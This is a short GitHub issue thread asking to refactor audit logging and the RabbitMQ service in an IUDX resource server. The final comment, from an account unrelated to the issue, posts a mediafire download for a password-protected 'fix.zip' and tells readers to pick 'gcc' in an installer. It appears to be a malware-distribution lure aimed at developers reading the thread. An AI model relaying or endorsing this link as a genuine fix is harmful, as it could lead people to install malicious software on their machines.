### ISSUE TITLE
Refactor Audit Logs in RS server

### ISSUE THREAD

**Issue by Gokul-KG** [datakaveri/iudx-resource-server#531]
- [ ] Separate auditing into a distinct handler, relying only on the ContextHelper class to obtain inputs.
- [ ] Refactor the RMQ service to use a Future-based structure.

**Comment by Gokul-KG** [comment]
create a seperate branch and implement this

**Comment by Vomgnar** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."
